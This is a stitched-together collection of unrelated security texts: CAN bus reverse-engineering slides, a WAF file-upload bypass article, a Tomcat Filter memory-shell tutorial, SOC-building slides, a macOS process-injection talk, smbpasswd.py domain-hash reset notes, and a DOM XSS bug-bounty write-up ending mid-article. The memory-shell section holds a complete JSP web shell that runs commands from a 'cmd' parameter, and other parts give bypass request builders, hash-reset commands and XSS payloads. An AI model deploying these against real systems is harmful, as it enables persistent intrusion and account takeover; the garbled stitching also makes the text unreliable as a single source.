10 =                1 0 1 0 0 0 0 0 1 1  = 3
11 =                1 0 1 1 0 0 0 1 0 0  = 4
12 =                1 1 0 0 0 0 0 1 0 1  = 5
13 =                1 1 0 1 0 0 0 1 1 0  = 6
14 =                1 1 1 0 0 0 0 1 1 1  = 7
Bit Position:       0 1 2 3 4 5 6 7 8 9

Consecutive observed payloads:
                    0 1 1 1 0 0 0 0 0 0
                    1 0 0 0 0 0 0 0 0 1
                    1 0 0 1 0 0 0 0 1 0
                    1 0 1 0 0 0 0 0 1 1
                    1 0 1 1 0 0 0 1 0 0
                    1 1 0 0 0 0 0 1 0 1
                    1 1 0 1 0 0 0 1 1 0
                    1 1 1 0 0 0 0 1 1 1

XOR truth table:
A B  Output
0 0  0
0 1  1
1 0  1
1 1  0
Payload Tokenization
By Least Significant Bit

Bit Position:       0 1 2 3 4 5 6 7 8 9
XOR of consecutive payloads:
                    1 1 1 1 0 0 0 0 0 1
                    0 0 0 1 0 0 0 0 1 1
                    0 0 1 1 0 0 0 0 0 1
                    0 0 0 1 0 0 0 1 1 1
                    0 1 1 1 0 0 0 0 0 1
                    0 0 0 1 0 0 0 0 1 1
                    0 0 1 1 0 0 0 0 0 1

XOR truth table:
A B  Output
0 0  0
0 1  1
1 0  1
1 1  0
Payload Tokenization
By Least Significant Bit

Bit Position:       0 1 2 3 4 5 6 7 8 9
                    1 1 1 1 0 0 0 0 0 1
                    0 0 0 1 0 0 0 0 1 1
                    0 0 1 1 0 0 0 0 0 1
                    0 0 0 1 0 0 0 1 1 1
                    0 1 1 1 0 0 0 0 0 1
                    0 0 0 1 0 0 0 0 1 1
                    0 0 1 1 0 0 0 0 0 1
                  + -------------------
Bit-flip totals:    1 2 4 7 0 0 0 1 3 7
Unsupervised Reverse Engineering
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
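The transition counting behind the TANG step can be reproduced in a few lines. This sketch (my own, not the repository code) XORs each payload with its successor and sums the flips per bit position; on the eight example payloads from the earlier slides it yields exactly the per-column totals shown there:

```python
def bit_flip_counts(payloads):
    """Count, per bit position, how often the bit flips between consecutive payloads."""
    width = len(payloads[0])
    totals = [0] * width
    for prev, cur in zip(payloads, payloads[1:]):
        for i in range(width):
            totals[i] += prev[i] ^ cur[i]  # XOR is 1 exactly when the bit changed
    return totals

# The eight observed payloads from the slides, bit positions 0..9.
payloads = [
    [0, 1, 1, 1, 0, 0, 0, 0, 0, 0],
    [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
    [1, 0, 0, 1, 0, 0, 0, 0, 1, 0],
    [1, 0, 1, 0, 0, 0, 0, 0, 1, 1],
    [1, 0, 1, 1, 0, 0, 0, 1, 0, 0],
    [1, 1, 0, 0, 0, 0, 0, 1, 0, 1],
    [1, 1, 0, 1, 0, 0, 0, 1, 1, 0],
    [1, 1, 1, 0, 0, 0, 0, 1, 1, 1],
]
print(bit_flip_counts(payloads))  # → [1, 2, 4, 7, 0, 0, 0, 1, 3, 7]
```

Bit positions whose flip counts jump (here position 3 and 9 flip on every sample) mark likely least-significant-bit boundaries between packed signals.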
Payload Tokenization
By Least Significant Bit
Unsupervised Reverse Engineering
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
[26] SAE International, “SAE J1979: E/E Diagnostic Test Modes,” 2017.
J1979 Speed [26]
Semantic Analysis
Correlated and Causal Relationships
SHOW ME WHAT YOU GOT!
Let's reverse engineer some cars!
https://github.com/brent-stone/CAN_Reverse_Engineering
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 1
VEHICLE 2
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 3
VEHICLE 4
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 5
VEHICLE 6
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 7
VEHICLE 8
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 9
VEHICLE 10
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 11
VEHICLE 12
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 13
VEHICLE 14
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 15
VEHICLE 16
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 17
QUESTIONS
BRENT STONE
Bypassing a WAF on File Upload: Reading the commons-fileupload Source

1. Preface

During a previous HVV engagement I ran into a file upload with a WAF I could not get past, so I decided to read through the upload parsing flow for anything exploitable; hence this article. That time it was mainly the filename field I could not sneak through. I tried quite a few approaches and will not list them one by one.

2. How the filename is obtained

First I set up an environment similar to the target, using commons-fileupload for the upload handling. Set a breakpoint at formLists = fileUpload.parseRequest(request); and step into the upload parsing flow.

Note that by the lines below, parsing has clearly finished already, so the parsing itself must happen at the arrow.

Step into org.apache.commons.fileupload.FileUploadBase.FileItemIteratorImpl#FileItemIteratorImpl.
Notice this spot: the Content-Type only has to start with multipart/; the form-data part can be omitted.

After that, the request is split according to the boundary.

There are some other interesting details along the way that I will not dwell on; let's go straight to where the filename is obtained:
org.apache.commons.fileupload.FileUploadBase#getFileName(java.lang.String)

Parsing happens here, and the value of filename is extracted.

This is where the parameter name and parameter value are read. Step into parseToken.

isOneOf

getToken

Roughly, it first splits form-data; name="file"; filename="11111.jsp" on semicolons, then takes the value in front of the equals sign.

Notice the call to Character.isWhitespace.

It checks whether a character is whitespace, and that covers more than the ordinary space we usually use; it also includes:

%20
%09
%0a
%0b
%0c
%0d
%1c
%1d
%1e
%1f

That gave me the WAF-bypass idea: we can put these whitespace characters before or after the filename, so the WAF can no longer match the uploaded file name, while the upload still parses normally.

At this point the filename check is bypassed; there are plenty of ways to bypass content inspection, so I will not cover them here.
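To illustrate the trick, here is a rough sketch of building such a request body by hand. This is only my own illustration, not the original exploit; the field name "file", the JSP name, and the boundary are made up. The filename is prefixed with a \t tab, which Character.isWhitespace strips server-side while a naive WAF regex anchored on the literal filename may no longer match:

```python
def build_multipart(filename, content, boundary="----boundary1337"):
    """Build a multipart/form-data body whose filename is prefixed with a tab."""
    body = (
        "--{b}\r\n"
        'Content-Disposition: form-data; name="file"; filename="\t{f}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        "{c}\r\n"
        "--{b}--\r\n"
    ).format(b=boundary, f=filename, c=content)
    # As noted above, the server side only requires the header to *start* with
    # "multipart/", so even this non-standard subtype is accepted.
    headers = {"Content-Type": "multipart/x-anything; boundary=" + boundary}
    return headers, body.encode()

headers, body = build_multipart("11111.jsp", "<%-- payload --%>")
```

The same construction works with any of the other whitespace bytes from the list above in place of the tab.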
I only noticed this one spot at the time; a closer read later turned up many more, and .NET's context.Request.Files also has some interesting behavior. Go take a look.
Filter Memory Shells

Classification

A Filter memory shell is one kind of servlet-api memory shell. Recent Tomcat versions provide methods for dynamically registering Tomcat components, among them addFilter, which registers a Filter at runtime.

Filter lifecycle

If you have debugged the Tomcat source before, you know that a Filter is started via its init method when the Tomcat server starts and destroyed via destroy when the server shuts down. In between, filtering is performed by the doFilter method.
public class demoFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        System.out.println("Filter init.....");
    }
    @Override
    public void doFilter(ServletRequest request, ServletResponse response,
                         FilterChain chain) throws IOException, ServletException {
        System.out.println("Filter running");
        // decide whether to let the request through
        // let it through
        chain.doFilter(request, response);
        System.out.println("Filter returned");
    }
    @Override
    public void destroy() {
        System.out.println("Filter destroy.....");
    }
}

Let's walk through the Filter lifecycle from the source.
1. Initialization: done during server startup. The Filter is registered in org.apache.catalina.core.ApplicationContext. During this phase the ApplicationContext class first checks its state, then runs the Filter initialization, filling the Filter's information into three fields: filterDefs, filterMaps and filterConfigs. Note that the context object here is the StandardContext object.
2. First, filterDefs is populated.
3. Next, filterMaps is populated.
4. Finally, filterConfigs is populated; this step happens after the filter's init method has been executed.
5. The class initialization is then carried out in the StandardContext class. This step calls the Filter's init method.
6. Filter execution: first the FilterChain is created and populated. The Filter itself was created during initialization, but the FilterChain is recreated for every request, and the servlet is placed into the FilterChain as well.
7. createFilterChain iterates over the filterMaps populated at initialization, pulls out each filter's information, then assembles the filterChain.
8. Destruction: done when the server shuts down.

Filter memory shell approach

Following the initialization flow in the source above, we obtain the StandardContext, then imitate the population process and fill in all three fields. During the next request, our custom filter is then automatically assembled into the FilterChain.

Source reference: n1nty, "Tomcat source-code debugging notes: the invisible shell", probably the earliest article to study memory shells. The idea is to keep using reflection until you reach the StandardContext, then fill in the Filter's three structures.
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ page import="java.io.IOException"%>
<%@ page import="javax.servlet.DispatcherType"%>
<%@ page import="javax.servlet.Filter"%>
<%@ page import="javax.servlet.FilterChain"%>
<%@ page import="javax.servlet.FilterConfig"%>
<%@ page import="javax.servlet.FilterRegistration"%>
<%@ page import="javax.servlet.ServletContext"%>
<%@ page import="javax.servlet.ServletException"%>
<%@ page import="javax.servlet.ServletRequest"%>
<%@ page import="javax.servlet.ServletResponse"%>
<%@ page import="javax.servlet.annotation.WebServlet"%>
<%@ page import="javax.servlet.http.HttpServlet"%>
<%@ page import="javax.servlet.http.HttpServletRequest"%>
<%@ page import="javax.servlet.http.HttpServletResponse"%>
<%@ page import="org.apache.catalina.core.ApplicationContext"%>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig"%>
<%@ page import="org.apache.catalina.core.StandardContext"%>
<%@ page import="org.apache.tomcat.util.descriptor.web.*"%>
<%@ page import="org.apache.catalina.Context"%>
<%@ page import="java.lang.reflect.*"%>
<%@ page import="java.util.EnumSet"%>
<%@ page import="java.util.Map"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
final String name = "n1ntyfilter";
ServletContext ctx = request.getSession().getServletContext();
Field f = ctx.getClass().getDeclaredField("context");
f.setAccessible(true);
ApplicationContext appCtx = (ApplicationContext)f.get(ctx);
f = appCtx.getClass().getDeclaredField("context");
f.setAccessible(true);
StandardContext standardCtx = (StandardContext)f.get(appCtx);
f = standardCtx.getClass().getDeclaredField("filterConfigs");
f.setAccessible(true);
Map filterConfigs = (Map)f.get(standardCtx);
if (filterConfigs.get(name) == null) {
out.println("inject "+ name);
Filter filter = new Filter() {
@Override
public void init(FilterConfig arg0) throws ServletException {
// TODO Auto-generated method stub
}
@Override
public void doFilter(ServletRequest arg0, ServletResponse arg1,
FilterChain arg2)
throws IOException, ServletException {
// TODO Auto-generated method stub
HttpServletRequest req = (HttpServletRequest)arg0;
if (req.getParameter("cmd") != null) {
byte[] data = new byte[1024];
Process p = new ProcessBuilder("cmd.exe","/c",
req.getParameter("cmd")).start();
int len = p.getInputStream().read(data);
p.destroy();
arg1.getWriter().write(new String(data, 0, len));
return;
}
arg2.doFilter(arg0, arg1);
}
@Override
public void destroy() {
// TODO Auto-generated method stub
}
};
FilterDef filterDef = new FilterDef();
filterDef.setFilterName(name);
filterDef.setFilterClass(filter.getClass().getName());
filterDef.setFilter(filter);
standardCtx.addFilterDef(filterDef);
FilterMap m = new FilterMap();
m.setFilterName(filterDef.getFilterName());
m.setDispatcher(DispatcherType.REQUEST.name());
m.addURLPattern("/*");
standardCtx.addFilterMapBefore(m);
Constructor constructor =
ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,
FilterDef.class);
            constructor.setAccessible(true);
            FilterConfig filterConfig = (FilterConfig)constructor.newInstance(standardCtx, filterDef);
            filterConfigs.put(name, filterConfig);
            out.println("injected");
        }
%>
</body>
</html>

First visit the JSP to inject the Filter. After that, every request passes through our Filter first; add the cmd parameter and the command executes.
For little or no money…

What is a Security Operations Center (SOC)

Events
IDS
Management System
Analyst Systems
Analysts
Contextual Info
Reporting
Incident Response
Why do you need a SOC?

Central location to collect information on threats
• External Threats
• Internal Threats
• User activity
• Loss of systems and personal or sensitive data
• Provide evidence in investigations
Keep your organization running
• Health of your network and systems
Isn't a Firewall, IDS or AV enough?

Firewall is active and known by attackers
Protects your systems, not your users
Anti-Virus
Lag-time to catch new threats
Matches files, but not traffic patterns.
IDS alerts on events, but doesn't provide context
System logs
Proxy logs
DNS logs
Information from other people
Private Network
People
Management
Users
Other Experts
Analysts
Lab
Analyst Systems
Management Systems
IDS
Structure of a SOC
vs Techie using real-time tech 24/7

Private network
• Secure communication between IDS, Management System, Analyst Systems
• Management and update of IDS and rules
IDS system
Secured OS
IDS Software
• Snort
• Barnyard2
• Pulled Pork
• stunnel
Packet capture
• TCPDump
• Daemonlogger

Management system
Secured OS
LAMP
Management Software
• BASE, Snorby, OCCIM, Splunk, Nagios, etc.

Analyst Systems
Secured OS
Management System Interface
Analysis tools
• Wireshark
• Tcpdump
• Netwitness
But I thought you wanted a secure system!

Lab
Test system
• Test rules on the IDS
• Test Configuration changes
• Can be used as a backup
A safe environment to:
• Play with malware
• Try hacks
These activities can help you to discover the criteria to build custom rules for the IDS.
It's probably a good idea to use VM's for your lab.
Analysts (the meat of the operation)

You need highly skilled people who:
• Know networking
• Understand attacks
• Understand Malware
• Are comfortable with things like source code, hex, etc…
• Are open to new ideas
• Are creative thinkers
• Are good at deductive reasoning and critical thinking
• Have a passion for this
• Don't blink
• Don't ever call in sick
• Don't need sleep
• Love to keep learning
Other experts

System/Network Administrators
• Keep the whole thing working
• Tune IDS rules
Forensics Experts
• For more in-depth analysis
Incident Response
• To mitigate incidents after they happen
External entities
• Government, law enforcement, etc…
Users (the other white meat)

Report things
• Phishing emails
• Stolen property
• Loss of data
Do things
• Download malware
• Engage in inappropriate activities
The most widely deployed IDS you have
If "tuned" properly…

Management

To interface with other entities
Keep all the pieces from falling apart
Make it rain (decide who gets the money)
I guess someone has to make decisions...
The data

Network Events
Log files
• Firewalls
• Hosts
• Proxy Servers
• DNS Servers
Phone calls / emails / other sources

Handling all that data

All that data!
Filtering
False Positives
Thresholding
Categorization
Categorization

US-CERT recommends the following categories for events:

Category  Name
CAT 0     Exercise/Network Defense Testing
CAT 1     Successful unauthorized Access
CAT 2     Denial of service
CAT 3     Successful installation or post-install beaconing of malicious code
CAT 4     Improper Usage
CAT 5     Scans/probes/Attempted Access
CAT 6     Investigation

Analyzing something like malware
Mitigation/Incident Response

User education
User access controls
• Stop giving users administrative access
Proxy servers and firewalls
• Deny access to known bad sites
• Deny certain kinds of downloads
• Block posting to known bad IP's
>>
>>
Process injection
Breaking All macOS Security Layers
With a Single Vulnerability
>>
Hello!
I’m
Security researcher at Computest
Thijs Alkemade
>Thijs Alkemade (@xnyhps)
>Security researcher at Computest
>Computest research lab: Sector 7
>Other recent work includes:
- 0click Zoom RCE at Pwn2Own
Vancouver 2021
- Winning Pwn2Own Miami 2022 with 5
ICS vulnerabilities
About me
1. macOS security model
2. CVE-2021-30873: process injection using saved states
3. Using process injection for:
- Sandbox escape
- Privilege escalation
- SIP bypass
In this talk
macOS security model
In macOS 12 Monterey
>Users are security boundaries,
processes are not
>File permissions: POSIX flags
>Attach debugger: target must run
as same user
>root has full access
Old *NIX security model
>“Dangerous” operations now require the application to have an
entitlement
- Loading a kernel extension
- Modifying system files
- Debugging system processes
>More and more restrictions in each macOS release
- Debugging any app is now restricted
- “Data vaults” with restricted file access
SIP restrictions
>Process A executing code “as”
process B
>Many techniques are restricted by
SIP
>Hardened runtime prevents it in
apps:
- No DYLD_* environment variables
- Library validation
>But macOS is old, and large…
Process injection
>Common in third-party app
>Abuse TCC permissions: access webcam, microphone, etc.
>Downgrade attacks often work
>What’s better than process injection in one app? Process injection
everywhere!
Process injection
CVE-2021-30873
Process injection in AppKit
>Re-opening the windows of an app
when relaunched
>Restores unsaved documents
>Works automatically, can be
extended by developers
Saved state feature
>Stored in:
- ~/Library/Saved Application
State/<ID>.savedState
>windows.plist
- array of all windows, each with an
encryption key
>data.data
- custom format, AES-CBC encrypted
serialized object per record
Saved state storage
>Insecure deserialization can lead
to RCE
- Well known in C#, Java, Python, Ruby…
>Apple’s serialization is NSCoding
>Added NSSecureCoding in 10.8
(2012)
Serialization vulnerabilities
// Insecure
id obj = [decoder decodeObjectForKey:@"myKey"];
if (![obj isKindOfClass:[MyClass class]]) { /* ...fail... */
}
// Secure
id obj = [decoder decodeObjectOfClass:[MyClass class]
forKey:@"myKey"];
1. Create a saved state using a malicious serialized object
2. Write it to the saved state directory of the other app
3. Launch other app
4. App automatically deserializes our object
5. Execute code in the other app!
Exploiting for process injection
>ysoserial-objective-c?
>Google Project Zero writeups?
What object to write?
Insecure deserialization with NSCoding
And defeating the hardened runtime by executing Python
>Disassemble -initWithCoder: methods
>Surprisingly, many classes do not support secure coding!
>…but in most cases it only recursively decodes instance variables
Search for an object chain
> NSRuleEditor creates a binding to a keypath also from the archive:
ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
...
id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"];
...
if (arrayOwner) {
keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"];
[self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil];
}
...
}
> Result: call any zero-argument method on a deserialized object
Step 1: NSRuleEditor
> NSCustomImageRep obtains an object and selector from the archive:
ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
...
self.drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"];
id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"];
self.drawMethod = NSSelectorFromString(drawMethod);
...
}
Step 2: NSCustomImageRep
> NSCustomImageRep in –draw then calls the selector on the object:
void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1)
{
...
[self.drawObject performSelector:self.drawMethod withObject:self];
...
}
> Result: call any method on a deserialized object (limited control over arguments)
Step 2: NSCustomImageRep
1. Call zero-argument methods on deserialized objects
2. Call any method on deserialized objects
3. Create objects not implementing NSCoder
4. Call zero-argument methods on arbitrary objects
5. Call any method on arbitrary objects
6. Evaluate AppleScript
7. Evaluate AppleScript with the AppleScript-Objective-C bridge
8. Evaluate Python
9. Import ctypes
10.Execute code equivalent to native code
Deserialization to arbitrary code execution
Exploitation
Sandbox escape
Window: the app
Contents: openAndSavePanelService
>Open/save panel loaded its saved
state from the same files as the
app!
- Write new object in the app’s own
saved state directory
- Open a panel
- Sandbox escaped!
>Fixed in 11.3: no long shares
directory
Sandbox escape
Exploitation
Privilege escalation to root
>Use the same technique as
“Unauthd - Logic bugs FTW” by
Ilias Morad
>First, find an app with
entitlement:
com.apple.private.AuthorizationServices
containing:
system.install.apple-software
Privelege escalation
>Then, install this package to a
RAM disk
>It runs a post-install script from
the target disk as root
- Target disk may not even have macOS!
- Mounting a RAM disk does not require
root
Privilege escalation
Exploitation
SIP filesystem bypass
>App from the macOS Big Sur beta
installation dmg
>Has the entitlement:
- com.apple.rootless.install.her
itable
>Very powerful entitlement: access
all SIP protected files!
- Heritable as a bonus, so can spawn a
reverse shell
SIP filesystem bypass
>Read mail, messages, Safari
history, etc. of all users
>Grant ourselves permission for
webcam, microphone, etc.
>Powerful persistence (SIP
protected locations, delete MRT)
>Load a kernel extension without
user approval
SIP filesystem bypass: result
The fixes
>In Monterey, apps can indicate if it accepts only secure serialized objects in
its saved state
- Already enabled for Apple’s apps
- Existing apps may want to store objects that do not implement secure deserialization
- Unclear if exploitable when apps don’t use custom serialized objects
>Reported December 4, 2020
>Sandbox escape fixed (CVE-2021-30659) in 11.3 (April 26, 2021)
>Fix introduced in macOS Monterey 12.0.1 (October 25, 2021)
- Not backported to Big Sur or Catalina!
The fixes
Conclusion
>macOS has a security boundary between processes
>Process injection vulnerabilities can be used to break those boundaries
>CVE-2021-30873 was a process injection vulnerability affecting AppKit apps
>We used it to escape the sandbox, privilege escalation, bypassing SIP
>Fixed by Apple in Monterey (only!)
Conclusion
>macOS security keeps adding more and more defensive layers
>Adding new layers to an established system is hard
- Code written 10+ years ago without security requirements is today’s attack surface
>Effort of attackers may not increase with more layers
- Use the same bug for multiple layers or skip layers
Black Hat Sound Bytes
> https://wojciechregula.blog/post/abusing-electron-apps-to-bypass-macos-security-
controls/
> https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-1.html
> https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html
> https://a2nkf.github.io/unauthd_Logic_bugs_FTW/
> https://mjtsai.com/blog/2015/11/08/the-java-deserialization-bug-and-nssecurecoding/
> https://developer.apple.com/documentation/foundation/nssecurecoding?language=objc
> https://github.com/frohoff/ysoserial
> https://github.com/pwntester/ysoserial.net
References
Modifying a Windows Hash

This is normally done after taking over the domain controller. It is best to make the change with domain-admin rights, which avoids the account/password-expiry problem.

# Change as administrator
python3 smbpasswd.py test.com/[email protected] -newpass "Test@123456666" -altuser administrator -altpass "Test@123" -debug -admin

Other examples:

smbpasswd.py [email protected]
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -altuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!' -admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6a2091001d98a913ab

If the expiry problem does occur, you can fix the user's attributes on the domain controller, or do it remotely via dsmod.
Exploitation with smbpasswd.py purely over port 445
P.S.: on Windows, use double quotes.
Change the password of the user below through a domain admin account.
Analysis
powershell "Set-ADUser -Identity zhangsan -ChangePasswordAtLogon $false"
# Remote operation
dsquery.exe user -s 192.168.111.146 -u administrator -p Test@123 -name zhangsan
dsmod user "CN=zhangsan,CN=Users,DC=test,DC=com" -s 192.168.111.146 -u administrator -p Test@123 -mustchpwd no -acctexpires never
smbpasswd.py [email protected]
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971
889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b
58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -a
ltuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b
58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!'
-admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502
da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6
a2091001d98a913ab
1
2
3
4
5
6
7
Examples:
Shell
复制代码
Why is -altuser needed? In scenarios like the one below, the user cannot change their own password, so the change must be made with an administrator account.
Under the hood this is done over the SAMR protocol. The usage scenarios of the different RPC functions are listed below; the example above uses the first one.
python3 smbpasswd.py test.com/[email protected] -newpass "Test@123456666" -altuser administrator -altpass "Test@123" -debug -admin
Problem: changing the password works fine, but setting the hash directly may cause the account to be flagged as expired, so the user must change their password before logging in again, which may get the operation noticed.
Someone submitted a PR for this; worth revisiting. (It turns out the PR was merged long ago, yet the issue still occurs, so the problem must lie in how the operation is performed.)
https://github.com/SecureAuthCorp/impacket/pull/381
The attribute can be changed on the domain controller.
In the Microsoft documentation there is a structure containing a field named PasswordMustChange; worth checking whether it is useful.
hSamrSetInformationUser: an administrator sets the password to a plaintext value or a hash
hSamrUnicodeChangePasswordUser2: the user changes their own password to a new plaintext value
hSamrChangePasswordUser: the user changes their own password to a new hash
powershell "Set-ADUser -Identity zhangsan -ChangePasswordAtLogon $false"
Here is an example that uses SamSetInformationUser to modify UserAllInformation; you only need to tweak the PasswordMustChange field:
https://github.com/loong716/CPPPractice/blob/master/AddUserBypass_SAMR/AddUserBypass_SAMR/AddUserBypass_SAMR.c
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/29b54f06-8961-43fd-8ecb-4b2a8020d474
There is also an article (https://xz.aliyun.com/t/10126) noting that changing the password via SamrUnicodeChangePasswordUser2 avoids the expiration restriction.
Looking at the same code again: only a plaintext change goes through hSamrUnicodeChangePasswordUser2; when restoring the original hash, hSamrChangePasswordUser is called instead, which is why the expiration problem appears.
This also corresponds to mimikatz's SetNTLM (SamrSetInformationUser) for resetting a password and ChangeNTLM (SamrChangePasswordUser) for changing one.
Preface
When participating in bug bounties, some people near the top of the leaderboard score very high. Besides being diligent, they have good automation for finding vulnerabilities in assets. Competition on a bounty platform like HackerOne is fierce: obvious vulnerabilities are rare, and unless the asset is unusual or the vulnerable spot is well hidden, bugs are not easy to find. When I first joined the platform, XSS was the easiest thing to start with, so I spent a lot of time on it. But reflected XSS duplicates easily, because other people find it, or scan for it, just as easily. So in that early period I focused on DOM XSS and built automation to help me find this class of bug. Although XSS is not taken very seriously in China, the rewards for XSS abroad are decent, which is a great incentive for learning this bug class, because there is money to be made (^-^). Some mentors also kindly helped me along the way, for which I am very grateful. So I want to share some of the DOM XSS I ran into in bug bounties, in the hope that it helps beginners.
(This article contains nothing about how to scan for DOM XSS.)
(Many of the cases have been fixed, so the vulnerable code had to be recovered from bug reports or via the Wayback Machine, with slight edits.)
(Some cases have very complex, atypical DOM; this article only shares some classic cases that may be useful as references while hunting.)
(Although rewards for XSS abroad are decent, XSS is still a medium-severity class. Compared with SSRF, RCE, or SQL injection, the bounties are usually much lower, so to earn more in bug bounties you still need to research high-impact bug classes. I may share posts about other classes in the future.)
Results
Why put the results first? Because, as I said, money is the incentive, or rather the motivation; I am a simple man, I am in it for the money 🤣
I have received about $30,000 in total in DOM XSS bounties: the smallest $100, the largest $3,000, across roughly 70 reports, with 90% of the results coming from automation. It took about two years, partly because the early period went into optimizing and bug-fixing. I did not scan around the clock; I occasionally fed in some targets, being lazy, scatterbrained, and busy with other things, working on it on and off. The automation points me at likely weak spots, and a quick manual analysis then yields the result.
Cases
I wrote an article about DOM XSS quite a while ago; it can also give you more of the basics.
All of the following cases come from real websites.
When learning DOM XSS, the articles you find tend to show very obvious DOM XSS. I have found those too, but the odds of running into them are small.
For example:
var url = window.location.href;
var newUrl = 'DjamLanding.aspx';
var splitString = url.split('?url=');
if (splitString.length > 1) {
newUrl = splitString[1];
window.top.location.href = newUrl;
}
else {
// New Url With NO query string
alert('NO query string');
}
window.top.location.href = newUrl;
This one is trivial: split on ?url= and redirect to the result.
Payload https://test.com/xss?url=javascript:alert(1)
The most common pattern: Case 1
Summary: a specific parameter value is read from the URL and written into the page.
The key point in this pattern is how the parameter is retrieved.
1
var getUrlParameter = function getUrlParameter(sParam) {
    var sPageURL = window.location.search.substring(1),
        sURLVariables = sPageURL.split('&'),
        sParameterName,
        i;
    for (i = 0; i < sURLVariables.length; i++) {
        sParameterName = sURLVariables[i].split('=');
        if (sParameterName[0] === sParam) {
            return sParameterName[1] === undefined ? true : decodeURIComponent(sParameterName[1]);
        }
    }
};
2
function getQueryParamByName(e) {
    var t = window.location.href;
    e = e.replace(/[\[\]]/g, "\\$&");
    var a = new RegExp("[?&]" + e + "(=([^&#]*)|&|#|$)").exec(t);
    return a ? a[2] ? decodeURIComponent(a[2].replace(/\+/g, " ")) : "" : null
}
3
new URLSearchParams(window.location.search).get('ParamName')
What these three approaches have in common is that they all decode: the first two call decodeURIComponent, and the third, URLSearchParams, the native API for manipulating URL parameters, decodes as well.
Because the retrieved parameter value is decoded, writing it into the page without any sanitization causes XSS in most situations.
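That decoding step can be reproduced outside the browser. The following Python sketch (illustrative only; it is not code from any of the sites below) mimics what decodeURIComponent / URLSearchParams do to a percent-encoded query string:

```python
from urllib.parse import parse_qs

# A URL as the browser would send it: the payload is percent-encoded in transit.
url = "https://test.com/xss?sca_message=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
query = url.split("?", 1)[1]

# parse_qs decodes percent-escapes, just like decodeURIComponent / URLSearchParams.
value = parse_qs(query)["sca_message"][0]
print(value)  # <img src=x onerror=alert(1)>
```

Writing this decoded value into the DOM without escaping is exactly what produces the XSS in the cases below.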
----- 1
